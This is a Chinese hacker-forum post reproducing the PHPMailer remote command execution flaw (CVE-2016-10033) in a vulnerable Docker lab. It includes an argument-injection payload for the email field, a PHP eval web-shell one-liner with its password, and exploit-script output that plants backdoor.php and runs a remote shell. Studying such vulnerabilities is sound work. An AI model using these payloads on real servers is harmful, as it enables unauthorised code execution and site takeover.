跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

PHPMailer远程命令执行漏洞复现

精选回复

发布于

PHPMailer远程命令执行漏洞复现

5ffe4a283bb31.png

PHPMailer远程命令执行漏洞复现

一、漏洞简介

PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。

PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。

二、影响版本:

PHPMailer<5.2.18

三、漏洞复现

Docker环境:

dockerrun --rm -it -p8080:80vulnerables/cve-2016-10033

拉去镜像启动环境:

v2-9eeccbf95519c25d8f0248cbec864e2f_b.png

http://192.168.1.107:8080/

http://192.168.1.107:8080/在name处随便输入比如“aaa”,在email处输入:"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com在message处输入一句话木马:<?php@eval($_POST['thelostworld']);?>

v2-5ebafdabf7deb47d4224f28e184f5a47_b.png

上传完一句话木马后,页面会响应3-5分钟,响应时间较长

v2-5cea9097054ba4064721305d64b88b83_b.png

木马地址:http://192.168.1.107:8080/a.php 密码:thelostworld

v2-1598632be664f0e6fb4184b29367e0f9_b.png

虚拟终端:

v2-f3ac74c313751ca0e644b1771aa1ac4f_b.png

使用脚本:

获取脚本后台回复“PHPMailer”获取脚本

v2-776cd5ddab2f45a2b29b03033b136f2a_b.png

➜ Desktop ./exploit.sh192.168.1.107:8080[+] CVE-2016-10033exploitbyopsxcq[+] Exploiting192.168.1.107:8080[+] Target exploited, acessing shell at http://192.168.1.107:8080/backdoor.php[+] Checkingifthe backdoor was createdontarget system[+] Backdoor.php foundonremote system[+] Running whoamiwww-dataRemoteShell> [+] Running RemoteShell> id[+] Running iduid=33(www-data) gid=33(www-data) groups=33(www-data)

访问木马地址:

http://192.168.1.107:8080/backdoor.php

参考:

https://www.cnblogs.com/Hi-blog/p/7812008.html

https://www.exploit-db.com/exploits/40968

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。